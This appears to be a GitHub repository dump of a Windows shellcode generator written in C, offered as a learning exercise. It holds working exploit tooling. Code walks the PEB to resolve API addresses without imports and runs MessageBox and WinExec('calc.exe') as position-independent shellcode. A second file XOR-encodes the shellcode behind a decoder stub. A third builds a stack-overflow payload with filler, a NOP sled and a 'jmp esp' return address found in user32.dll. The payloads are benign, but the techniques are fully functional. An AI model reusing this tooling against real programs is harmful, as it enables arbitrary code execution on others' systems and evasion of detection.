├── .gitignore
├── LICENSE
├── README.md
├── enshellcode.cpp
├── getshellcode.cpp
├── jmpespshellcode.cpp
├── shellcode.bin
├── shellcode.cpp
├── shellcodenew.cpp
├── stackoverflowExample(jmpesp).cpp
├── stackoverflowshellcode.bin
├── testenshellcode.cpp
└── testshellcode.cpp


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Compiled Object files
 2 | *.slo
 3 | *.lo
 4 | *.o
 5 | *.obj
 6 | 
 7 | # Precompiled Headers
 8 | *.gch
 9 | *.pch
10 | 
11 | # Compiled Dynamic libraries
12 | *.so
13 | *.dylib
14 | *.dll
15 | 
16 | # Fortran module files
17 | *.mod
18 | *.smod
19 | 
20 | # Compiled Static libraries
21 | *.lai
22 | *.la
23 | *.a
24 | *.lib
25 | 
26 | # Executables
27 | *.exe
28 | *.out
29 | *.app
30 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2017, 
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | * Neither the name of the copyright holder nor the names of its
17 |   contributors may be used to endorse or promote products derived from
18 |   this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode-Generater
 2 | 
 3 | Exercise of Writing Windows Shellcode in C:
 4 | 
 5 | - No inline asm
 6 | - support x86/x64
 7 | 
 8 | Created By 3gstudent @3gstudent
 9 | 
10 | More to do:
11 | 
12 | - Need  to combine the sub function (Done. See shellcodenew.cpp)
13 | 
14 | 
15 | Learn form:
16 | 
17 | http://bbs.pediy.com/showthread.php?t=203140
18 | 
19 | More details：
20 | 
21 | https://3gstudent.github.io/Windows-Shellcode%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E9%80%9A%E8%BF%87VisualStudio%E7%94%9F%E6%88%90shellcode
22 | 


--------------------------------------------------------------------------------
/enshellcode.cpp:
--------------------------------------------------------------------------------
 1 | #include <windows.h>
 2 | size_t GetSize(char * szFilePath)
 3 | {
 4 | 	size_t size;
 5 | 	FILE* f = fopen(szFilePath, "rb");
 6 | 	fseek(f, 0, SEEK_END);
 7 | 	size = ftell(f);
 8 | 	rewind(f);
 9 | 	fclose(f);
10 | 	return size;
11 | }
12 | unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
13 | {
14 | 	unsigned char *p = NULL;
15 | 	FILE* f = NULL;
16 | 	size_t res = 0;
17 | 	*size = GetSize(szFilePath);
18 | 	if (*size == 0) return NULL;		
19 | 	f = fopen(szFilePath, "rb");
20 | 	if (f == NULL)
21 | 	{
22 | 		printf("Binary file does not exists!\n");
23 | 		return 0;
24 | 	}
25 | 	p = new unsigned char[*size];
26 | 	rewind(f);
27 | 	res = fread(p, sizeof(unsigned char), *size, f);
28 | 	fclose(f);
29 | 	if (res == 0)
30 | 	{
31 | 		delete[] p;
32 | 		return NULL;
33 | 	}
34 | 	return p;
35 | }
36 | int main(int argc, char* argv[])
37 | {
38 | 	char *szFilePath="c:\\test\\shellcode.bin";
39 | 	char *szFilePath2="c:\\test\\shellcode2.bin";
40 | 	unsigned char *BinData = NULL;
41 | 	size_t size = 0;	
42 | 	BinData = ReadBinaryFile(szFilePath, &size);
43 | 	for(int i=0;i<size;i++)
44 | 	{
45 | 		BinData[i]=BinData[i]^0x44;
46 | 	}
47 | 	FILE* f = NULL;
48 | 	f = fopen(szFilePath2, "wb");
49 | 	if (f == NULL)
50 | 	{
51 | 		printf("Create error\n");
52 | 		return 0;
53 | 	}
54 | 	char decode[]="\x83\xC0\x14\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1C\x08\x41\x80\xFB\x91\x75\xF1";
55 | 	char end[]="\xD5";
56 | 	fwrite(decode,20,1,f);
57 | 	fwrite(BinData,size,1,f);
58 | 	fwrite(end,1,1,f);
59 | 	fclose(f);	
60 | 	f = fopen(szFilePath2, "rb");
61 | 	if (f == NULL)
62 | 	{
63 | 		printf("Create error\n");
64 | 		return 0;
65 | 	}
66 | 	unsigned char *BinData2 = NULL;
67 | 	size_t size2 = 0;	
68 | 	BinData2 = ReadBinaryFile(szFilePath2, &size2);
69 | 	printf("\"");
70 | 	for (int j=0;j<size2;j++)
71 | 	{
72 | 		printf("\\x%02x",BinData2[j]);
73 | 		if((j+1)%16==0)
74 | 			printf("\"\n\"");
75 | 	}
76 | 	printf("\"");
77 | 	fclose(f);
78 | 	return 0;
79 | }
80 | 


--------------------------------------------------------------------------------
/getshellcode.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <Winternl.h>
  3 | #pragma optimize( "", off ) 
  4 | void shell_code();
  5 | HANDLE GetKernel32Handle();
  6 | BOOL __ISUPPER__(__in CHAR c);
  7 | CHAR __TOLOWER__(__in CHAR c);
  8 | UINT __STRLEN__(__in LPSTR lpStr1);
  9 | UINT __STRLENW__(__in LPWSTR lpStr1);
 10 | LPWSTR __STRSTRIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2);
 11 | INT __STRCMPI__(__in LPSTR lpStr1, __in LPSTR lpStr2);
 12 | INT __STRNCMPIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2, __in DWORD dwLen);
 13 | LPVOID __MEMCPY__(__in LPVOID lpDst, __in LPVOID lpSrc, __in DWORD dwCount);
 14 | 
 15 | typedef FARPROC(WINAPI* GetProcAddressAPI)(HMODULE, LPCSTR);
 16 | typedef HMODULE(WINAPI* LoadLibraryWAPI)(LPCWSTR);
 17 | typedef ULONG (WINAPI *MESSAGEBOXAPI)(HWND, LPWSTR, LPWSTR, ULONG);
 18 | 
 19 | 
 20 | void shell_code() {
 21 | 
 22 | 	LoadLibraryWAPI	loadlibrarywapi = 0;
 23 | 	GetProcAddressAPI getprocaddressapi=0;
 24 | 	MESSAGEBOXAPI messageboxapi=0;
 25 | 
 26 | 	wchar_t struser32[] = { L'u', L's', L'e', L'r', L'3',L'2', L'.', L'd', L'l', L'l', 0 };
 27 | 	char MeassageboxA_api[] = { 'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0 };
 28 | 
 29 | 	HANDLE hKernel32 = GetKernel32Handle();
 30 | 	if (hKernel32 == INVALID_HANDLE_VALUE) {
 31 | 		return;
 32 | 	}
 33 | 	LPBYTE lpBaseAddr = (LPBYTE)hKernel32;
 34 | 	PIMAGE_DOS_HEADER lpDosHdr = (PIMAGE_DOS_HEADER)lpBaseAddr;
 35 | 	PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS)(lpBaseAddr + lpDosHdr->e_lfanew);
 36 | 	PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)(lpBaseAddr + pNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
 37 | 
 38 | 	LPDWORD pNameArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfNames);
 39 | 	LPDWORD pAddrArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfFunctions);
 40 | 	LPWORD pOrdArray = (LPWORD)(lpBaseAddr + pExportDir->AddressOfNameOrdinals);
 41 | 	CHAR strLoadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'W', 0x0 };
 42 | 	CHAR strGetProcAddress[] = { 'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0x0 };
 43 | 
 44 | 	for (UINT i = 0; i < pExportDir->NumberOfNames; i++) {
 45 | 		LPSTR pFuncName = (LPSTR)(lpBaseAddr + pNameArray[i]);
 46 | 		if (!__STRCMPI__(pFuncName, strGetProcAddress)) {
 47 | 			getprocaddressapi=(GetProcAddressAPI)(lpBaseAddr + pAddrArray[pOrdArray[i]]);
 48 | 		}
 49 | 		else if (!__STRCMPI__(pFuncName, strLoadLibraryA)) {
 50 | 			loadlibrarywapi=(LoadLibraryWAPI) (lpBaseAddr + pAddrArray[pOrdArray[i]]);
 51 | 		}
 52 | 		if (getprocaddressapi != nullptr && loadlibrarywapi != nullptr) {				
 53 | 			messageboxapi=(MESSAGEBOXAPI)getprocaddressapi(loadlibrarywapi(struser32), MeassageboxA_api);
 54 | 			messageboxapi(NULL, NULL, NULL, 0);
 55 | 			return;
 56 | 		}
 57 | 	}
 58 | }
 59 | 
 60 | inline BOOL __ISUPPER__(__in CHAR c) {
 61 | 	return ('A' <= c) && (c <= 'Z');
 62 | };
 63 | inline CHAR __TOLOWER__(__in CHAR c) {
 64 | 	return __ISUPPER__(c) ? c - 'A' + 'a' : c;
 65 | };
 66 | 
 67 | UINT __STRLEN__(__in LPSTR lpStr1)
 68 | {
 69 | 	UINT i = 0;
 70 | 	while (lpStr1[i] != 0x0)
 71 | 		i++;
 72 | 	return i;
 73 | }
 74 | 
 75 | UINT __STRLENW__(__in LPWSTR lpStr1)
 76 | {
 77 | 	UINT i = 0;
 78 | 	while (lpStr1[i] != L'\0')
 79 | 		i++;
 80 | 	return i;
 81 | }
 82 | 
 83 | LPWSTR __STRSTRIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2)
 84 | {
 85 | 	CHAR c = __TOLOWER__(((PCHAR)(lpStr2++))[0]);
 86 | 	if (!c)
 87 | 		return lpStr1;
 88 | 	UINT dwLen = __STRLENW__(lpStr2);
 89 | 	do
 90 | 	{
 91 | 		CHAR sc;
 92 | 		do
 93 | 		{
 94 | 			sc = __TOLOWER__(((PCHAR)(lpStr1)++)[0]);
 95 | 			if (!sc)
 96 | 				return NULL;
 97 | 		} while (sc != c);
 98 | 	} while (__STRNCMPIW__(lpStr1, lpStr2, dwLen) != 0);
 99 | 	return (lpStr1 - 1); // FIXME -2 ?
100 | }
101 | 
102 | INT __STRCMPI__(
103 | 	__in LPSTR lpStr1,
104 | 	__in LPSTR lpStr2)
105 | {
106 | 	int  v;
107 | 	CHAR c1, c2;
108 | 	do
109 | 	{
110 | 		c1 = *lpStr1++;
111 | 		c2 = *lpStr2++;
112 | 		// The casts are necessary when pStr1 is shorter & char is signed 
113 | 		v = (UINT)__TOLOWER__(c1) - (UINT)__TOLOWER__(c2);
114 | 	} while ((v == 0) && (c1 != '\0') && (c2 != '\0'));
115 | 	return v;
116 | }
117 | 
118 | INT __STRNCMPIW__(
119 | 	__in LPWSTR lpStr1,
120 | 	__in LPWSTR lpStr2,
121 | 	__in DWORD dwLen)
122 | {
123 | 	int  v;
124 | 	CHAR c1, c2;
125 | 	do {
126 | 		dwLen--;
127 | 		c1 = ((PCHAR)lpStr1++)[0];
128 | 		c2 = ((PCHAR)lpStr2++)[0];
129 | 		/* The casts are necessary when pStr1 is shorter & char is signed */
130 | 		v = (UINT)__TOLOWER__(c1) - (UINT)__TOLOWER__(c2);
131 | 	} while ((v == 0) && (c1 != 0x0) && (c2 != 0x0) && dwLen > 0);
132 | 	return v;
133 | }
134 | 
135 | LPSTR __STRCAT__(
136 | 	__in LPSTR	strDest,
137 | 	__in LPSTR strSource)
138 | {
139 | 	LPSTR d = strDest;
140 | 	LPSTR s = strSource;
141 | 	while (*d) d++;
142 | 	do { *d++ = *s++; } while (*s);
143 | 	*d = 0x0;
144 | 	return strDest;
145 | }
146 | 
147 | LPVOID __MEMCPY__(
148 | 	__in LPVOID lpDst,
149 | 	__in LPVOID lpSrc,
150 | 	__in DWORD dwCount)
151 | {
152 | 	LPBYTE s = (LPBYTE)lpSrc;
153 | 	LPBYTE d = (LPBYTE)lpDst;
154 | 	while (dwCount--)
155 | 		*d++ = *s++;
156 | 	return lpDst;
157 | }
158 | 
159 | HANDLE GetKernel32Handle() {
160 | 	HANDLE hKernel32 = INVALID_HANDLE_VALUE;
161 | #ifdef _WIN64
162 | 	PPEB lpPeb = (PPEB)__readgsqword(0x60);
163 | #else
164 | 	PPEB lpPeb = (PPEB)__readfsdword(0x30);
165 | #endif
166 | 	PLIST_ENTRY pListHead = &lpPeb->Ldr->InMemoryOrderModuleList;
167 | 	PLIST_ENTRY pListEntry = pListHead->Flink;
168 | 	WCHAR strDllName[MAX_PATH];
169 | 	WCHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', L'\0' };
170 | 
171 | 	while (pListEntry != pListHead) {
172 | 		PLDR_DATA_TABLE_ENTRY pModEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
173 | 		if (pModEntry->FullDllName.Length) {
174 | 			DWORD dwLen = pModEntry->FullDllName.Length;
175 | 			__MEMCPY__(strDllName, pModEntry->FullDllName.Buffer, dwLen);
176 | 			strDllName[dwLen / sizeof(WCHAR)] = L'\0';
177 | 			if (__STRSTRIW__(strDllName, strKernel32)) {
178 | 				hKernel32 = pModEntry->DllBase;
179 | 				break;
180 | 			}
181 | 		}
182 | 		pListEntry = pListEntry->Flink;
183 | 	}
184 | 	return hKernel32;
185 | }
186 | void __declspec(naked) END_SHELLCODE(void) {}
187 | int main()
188 | {
189 | 	shell_code();
190 | 
191 | 	FILE *output_file;
192 | 	fopen_s(&output_file,"shellcode.bin", "wb");
193 | 	fwrite(shell_code, (int)END_SHELLCODE - (int)shell_code, 1, output_file);
194 | 	fclose(output_file);
195 | 	return 0;
196 | }
197 | 


--------------------------------------------------------------------------------
/jmpespshellcode.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #define DLL_NAME "user32.dll"
  3 | 
  4 | int GetAddress()
  5 | {
  6 | 	BYTE *ptr;
  7 | 	int position,address;
  8 | 	HINSTANCE handle;
  9 | 	BOOL done_flag=FALSE;
 10 | 	handle=LoadLibrary(DLL_NAME);
 11 | 	if(!handle)
 12 | 	{
 13 | 		printf("load dll error");
 14 | 		return 0;
 15 | 	}
 16 | 	ptr=(BYTE *)handle;
 17 | 	for(position=0;!done_flag;position++)
 18 | 	{
 19 | 		try
 20 | 		{
 21 | 			if(ptr[position]==0xFF &&ptr[position+1]==0xE4)
 22 | 			{
 23 | 				int address=(int)ptr+position;
 24 | 				return address;				
 25 | 			}			
 26 | 		}
 27 | 		catch(...)
 28 | 		{
 29 | 		int address=(int)ptr+position;
 30 | 		printf("END OF 0x%x\n",address);
 31 | 		done_flag=true;
 32 | 		}
 33 | 	}
 34 | 	return 0;
 35 | }
 36 | size_t GetSize(char * szFilePath)
 37 | {
 38 | 	size_t size;
 39 | 	FILE* f = fopen(szFilePath, "rb");
 40 | 	fseek(f, 0, SEEK_END);
 41 | 	size = ftell(f);
 42 | 	rewind(f);
 43 | 	fclose(f);
 44 | 	return size;
 45 | }
 46 | unsigned char* ReadBinaryFile(char *szFilePath, size_t *size)
 47 | {
 48 | 	unsigned char *p = NULL;
 49 | 	FILE* f = NULL;
 50 | 	size_t res = 0;
 51 | 	*size = GetSize(szFilePath);
 52 | 	if (*size == 0) return NULL;		
 53 | 	f = fopen(szFilePath, "rb");
 54 | 	if (f == NULL)
 55 | 	{
 56 | 		printf("Binary file does not exists!\n");
 57 | 		return 0;
 58 | 	}
 59 | 	p = new unsigned char[*size];
 60 | 	rewind(f);
 61 | 	res = fread(p, sizeof(unsigned char), *size, f);
 62 | 	fclose(f);
 63 | 	if (res == 0)
 64 | 	{
 65 | 		delete[] p;
 66 | 		return NULL;
 67 | 	}
 68 | 	return p;
 69 | }
 70 | int main(int argc, char* argv[])
 71 | {
 72 | 	char *szFilePath="c:\\test\\shellcode.bin";
 73 | 	char *szFilePath2="c:\\test\\shellcode2.bin";
 74 | 	unsigned char *BinData = NULL;
 75 | 	size_t size = 0;	
 76 | 	BinData = ReadBinaryFile(szFilePath, &size);
 77 | 
 78 | 	for(int i=0;i<size;i++)
 79 | 	{
 80 | 		BinData[i]=BinData[i]^0x44;
 81 | 	}
 82 | 
 83 | 	FILE* f = NULL;	
 84 | 	f = fopen(szFilePath2, "wb");
 85 | 	if (f == NULL)
 86 | 	{
 87 | 		printf("Create error\n");
 88 | 		return 0;
 89 | 	}
 90 | 	
 91 | 	char filler[]="\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31\x34\x33\x32\x31";
 92 | 	char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90";
 93 | 	char decode[]="\x81\xC7\x11\x11\x11\x11\x81\xEF\xA1\x19\x11\x11\x8B\xC7\x83\xC0\x5A\x33\xC9\x8A\x1C\x08\x80\xF3\x44\x88\x1C\x08\x41\x80\xFB\x91\x75\xF1";
 94 | 	char end[]="\xD5";
 95 | 	fwrite(filler,sizeof(filler)-1,1,f);
 96 | 	fwrite(nop,sizeof(nop)-1,1,f);
 97 | 
 98 | 	int address = GetAddress();
 99 | 	unsigned char *jmpesp=(unsigned char *)&address;
100 | 	
101 | 	fwrite(jmpesp,4,1,f);
102 | 	fwrite(decode,sizeof(decode)-1,1,f);
103 | 	fwrite(BinData,size,1,f);
104 | 	fwrite(end,1,1,f);
105 | 	fclose(f);
106 | 
107 | 	return 0;
108 | }
109 | 


--------------------------------------------------------------------------------
/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/3gstudent/Shellcode-Generater/ca992ef1a5493e908bce18327c3efc1aeeb4c5f4/shellcode.bin


--------------------------------------------------------------------------------
/shellcode.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <Winternl.h>
  3 | #pragma optimize( "", off ) 
  4 | 
  5 | BOOL __ISUPPER__(__in CHAR c);
  6 | CHAR __TOLOWER__(__in CHAR c);
  7 | UINT __STRLEN__(__in LPSTR lpStr1);
  8 | UINT __STRLENW__(__in LPWSTR lpStr1);
  9 | LPWSTR __STRSTRIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2);
 10 | INT __STRCMPI__(__in LPSTR lpStr1, __in LPSTR lpStr2);
 11 | INT __STRNCMPIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2, __in DWORD dwLen);
 12 | LPVOID __MEMCPY__(__in LPVOID lpDst, __in LPVOID lpSrc, __in DWORD dwCount);
 13 | 
 14 | FARPROC(WINAPI* GetProcAddressAPI)(HMODULE, LPCSTR);
 15 | HMODULE(WINAPI* LoadLibraryWAPI)(LPCWSTR);
 16 | 
 17 | inline BOOL __ISUPPER__(__in CHAR c) {
 18 | 	return ('A' <= c) && (c <= 'Z');
 19 | };
 20 | inline CHAR __TOLOWER__(__in CHAR c) {
 21 | 	return __ISUPPER__(c) ? c - 'A' + 'a' : c;
 22 | };
 23 | 
 24 | UINT __STRLEN__(__in LPSTR lpStr1)
 25 | {
 26 | 	UINT i = 0;
 27 | 	while (lpStr1[i] != 0x0)
 28 | 		i++;
 29 | 
 30 | 	return i;
 31 | }
 32 | 
 33 | UINT __STRLENW__(__in LPWSTR lpStr1)
 34 | {
 35 | 	UINT i = 0;
 36 | 	while (lpStr1[i] != L'\0')
 37 | 		i++;
 38 | 
 39 | 	return i;
 40 | }
 41 | 
 42 | LPWSTR __STRSTRIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2)
 43 | {
 44 | 	CHAR c = __TOLOWER__(((PCHAR)(lpStr2++))[0]);
 45 | 	if (!c)
 46 | 		return lpStr1;
 47 | 
 48 | 	UINT dwLen = __STRLENW__(lpStr2);
 49 | 	do
 50 | 	{
 51 | 		CHAR sc;
 52 | 		do
 53 | 		{
 54 | 			sc = __TOLOWER__(((PCHAR)(lpStr1)++)[0]);
 55 | 			if (!sc)
 56 | 				return NULL;
 57 | 		} while (sc != c);
 58 | 	} while (__STRNCMPIW__(lpStr1, lpStr2, dwLen) != 0);
 59 | 
 60 | 	return (lpStr1 - 1); // FIXME -2 ?
 61 | }
 62 | 
 63 | INT __STRCMPI__(
 64 | 	__in LPSTR lpStr1,
 65 | 	__in LPSTR lpStr2)
 66 | {
 67 | 	int  v;
 68 | 	CHAR c1, c2;
 69 | 	do
 70 | 	{
 71 | 		c1 = *lpStr1++;
 72 | 		c2 = *lpStr2++;
 73 | 		// The casts are necessary when pStr1 is shorter & char is signed 
 74 | 		v = (UINT)__TOLOWER__(c1) - (UINT)__TOLOWER__(c2);
 75 | 	} while ((v == 0) && (c1 != '\0') && (c2 != '\0'));
 76 | 	return v;
 77 | }
 78 | 
 79 | INT __STRNCMPIW__(
 80 | 	__in LPWSTR lpStr1,
 81 | 	__in LPWSTR lpStr2,
 82 | 	__in DWORD dwLen)
 83 | {
 84 | 	int  v;
 85 | 	CHAR c1, c2;
 86 | 	do {
 87 | 		dwLen--;
 88 | 		c1 = ((PCHAR)lpStr1++)[0];
 89 | 		c2 = ((PCHAR)lpStr2++)[0];
 90 | 		/* The casts are necessary when pStr1 is shorter & char is signed */
 91 | 		v = (UINT)__TOLOWER__(c1) - (UINT)__TOLOWER__(c2);
 92 | 	} while ((v == 0) && (c1 != 0x0) && (c2 != 0x0) && dwLen > 0);
 93 | 
 94 | 	return v;
 95 | }
 96 | 
 97 | LPSTR __STRCAT__(
 98 | 	__in LPSTR	strDest,
 99 | 	__in LPSTR strSource)
100 | {
101 | 	LPSTR d = strDest;
102 | 	LPSTR s = strSource;
103 | 
104 | 	while (*d) d++;
105 | 
106 | 	do { *d++ = *s++; } while (*s);
107 | 	*d = 0x0;
108 | 
109 | 	return strDest;
110 | }
111 | 
112 | LPVOID __MEMCPY__(
113 | 	__in LPVOID lpDst,
114 | 	__in LPVOID lpSrc,
115 | 	__in DWORD dwCount)
116 | {
117 | 	LPBYTE s = (LPBYTE)lpSrc;
118 | 	LPBYTE d = (LPBYTE)lpDst;
119 | 
120 | 	while (dwCount--)
121 | 		*d++ = *s++;
122 | 
123 | 	return lpDst;
124 | }
125 | 
126 | HANDLE GetKernel32Handle() {
127 | 	HANDLE hKernel32 = INVALID_HANDLE_VALUE;
128 | #ifdef _WIN64
129 | 	PPEB lpPeb = (PPEB)__readgsqword(0x60);
130 | #else
131 | 	PPEB lpPeb = (PPEB)__readfsdword(0x30);
132 | #endif
133 | 	PLIST_ENTRY pListHead = &lpPeb->Ldr->InMemoryOrderModuleList;
134 | 	PLIST_ENTRY pListEntry = pListHead->Flink;
135 | 	WCHAR strDllName[MAX_PATH];
136 | 	WCHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', L'\0' };
137 | 
138 | 	while (pListEntry != pListHead) {
139 | 		PLDR_DATA_TABLE_ENTRY pModEntry = CONTAINING_RECORD(pListEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
140 | 		if (pModEntry->FullDllName.Length) {
141 | 			DWORD dwLen = pModEntry->FullDllName.Length;
142 | 			__MEMCPY__(strDllName, pModEntry->FullDllName.Buffer, dwLen);
143 | 			strDllName[dwLen / sizeof(WCHAR)] = L'\0';
144 | 			if (__STRSTRIW__(strDllName, strKernel32)) {
145 | 				hKernel32 = pModEntry->DllBase;
146 | 				break;
147 | 			}
148 | 		}
149 | 		pListEntry = pListEntry->Flink;
150 | 	}
151 | 	return hKernel32;
152 | }
153 | 
154 | BOOL Initialize() {
155 | 	HANDLE hKernel32 = GetKernel32Handle();
156 | 	if (hKernel32 == INVALID_HANDLE_VALUE) {
157 | 		return FALSE;
158 | 	}
159 | 	LPBYTE lpBaseAddr = (LPBYTE)hKernel32;
160 | 	PIMAGE_DOS_HEADER lpDosHdr = (PIMAGE_DOS_HEADER)lpBaseAddr;
161 | 	PIMAGE_NT_HEADERS pNtHdrs = (PIMAGE_NT_HEADERS)(lpBaseAddr + lpDosHdr->e_lfanew);
162 | 	PIMAGE_EXPORT_DIRECTORY pExportDir = (PIMAGE_EXPORT_DIRECTORY)(lpBaseAddr + pNtHdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
163 | 
164 | 	LPDWORD pNameArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfNames);
165 | 	LPDWORD pAddrArray = (LPDWORD)(lpBaseAddr + pExportDir->AddressOfFunctions);
166 | 	LPWORD pOrdArray = (LPWORD)(lpBaseAddr + pExportDir->AddressOfNameOrdinals);
167 | 	CHAR strLoadLibraryA[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'W', 0x0 };
168 | 	CHAR strGetProcAddress[] = { 'G', 'e', 't', 'P', 'r', 'o', 'c', 'A', 'd', 'd', 'r', 'e', 's', 's', 0x0 };
169 | 
170 | 	for (UINT i = 0; i < pExportDir->NumberOfNames; i++) {
171 | 		LPSTR pFuncName = (LPSTR)(lpBaseAddr + pNameArray[i]);
172 | 		if (!__STRCMPI__(pFuncName, strGetProcAddress)) {
173 | 			GetProcAddressAPI = (FARPROC(WINAPI*)(HMODULE, LPCSTR))(lpBaseAddr + pAddrArray[pOrdArray[i]]);
174 | 		}
175 | 		else if (!__STRCMPI__(pFuncName, strLoadLibraryA)) {
176 | 			LoadLibraryWAPI = (HMODULE(WINAPI*)(LPCWSTR))(lpBaseAddr + pAddrArray[pOrdArray[i]]);
177 | 		}
178 | 		if (GetProcAddressAPI != nullptr && LoadLibraryWAPI != nullptr) {
179 | 			return TRUE;
180 | 		}
181 | 	}
182 | 	return FALSE;
183 | }
184 | 
185 | 
186 | int main()
187 | {
188 | 	Initialize();
189 | 	wchar_t struser32[] = { L'u', L's', L'e', L'r', L'3',L'2', L'.', L'd', L'l', L'l', 0 };
190 | 	char MeassageboxA_api[] = { 'M', 'e', 's', 's', 'a', 'g', 'e', 'B', 'o', 'x', 'A', 0 };
191 | 
192 | 	using MESSAGEBOXA_INITIALIZE = UINT(WINAPI*)(HWND, LPCTSTR, LPCTSTR, UINT);
193 | 	MESSAGEBOXA_INITIALIZE MeassageboxA_MyOwn = reinterpret_cast<MESSAGEBOXA_INITIALIZE>(GetProcAddressAPI(LoadLibraryWAPI(struser32), MeassageboxA_api));
194 | 	MeassageboxA_MyOwn(NULL, NULL, NULL, 0);
195 | 
196 | 	WCHAR strKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', L'\0' };
197 | 	char WinExec_api[] = { 'W', 'i', 'n', 'E', 'x', 'e', 'c', 0 };
198 | 	char strCalc[] = { 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', L'\0' };
199 | 
200 | 	using WINEXEC_INITIALIZE = UINT(WINAPI*)(LPCSTR, UINT);
201 | 	WINEXEC_INITIALIZE WinExec_MyOwn = reinterpret_cast<WINEXEC_INITIALIZE>(GetProcAddressAPI(LoadLibraryWAPI(strKernel32), WinExec_api));
202 | 	WinExec_MyOwn(strCalc, 0);
203 | 
204 | 	return 0;
205 | }
206 | 
207 | 


--------------------------------------------------------------------------------
/shellcodenew.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdafx.h>
  2 | #include <windows.h>
  3 | #include <Winternl.h>
  4 | #pragma optimize( "", off ) 
  5 | void shell_code();
  6 | HANDLE GetKernel32Handle();
  7 | BOOL __ISUPPER__(__in CHAR c);
  8 | CHAR __TOLOWER__(__in CHAR c);
  9 | UINT __STRLEN__(__in LPSTR lpStr1);
 10 | UINT __STRLENW__(__in LPWSTR lpStr1);
 11 | LPWSTR __STRSTRIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2);
 12 | INT __STRCMPI__(__in LPSTR lpStr1, __in LPSTR lpStr2);
 13 | INT __STRNCMPIW__(__in LPWSTR lpStr1, __in LPWSTR lpStr2, __in DWORD dwLen);
 14 | LPVOID __MEMCPY__(__in LPVOID lpDst, __in LPVOID lpSrc, __in DWORD dwCount);
 15 | 
 16 | typedef FARPROC(WINAPI* GetProcAddressAPI)(HMODULE, LPCSTR);
 17 | typedef HMODULE(WINAPI* LoadLibraryWAPI)(LPCWSTR);
 18 | typedef ULONG (WINAPI *MESSAGEBOXAPI)(HWND, LPWSTR, LPWSTR, ULONG);
 19 | 
 20 | 
 21 | void shell_code() {
 22 | 
 23 | 	LoadLibraryWAPI	loadlibrarywapi = 0;
 24 | 	GetProcAddressAPI getprocaddressapi=0;
 25 | 	MESSAGEBOXAPI messageboxapi=0;
 26 | 
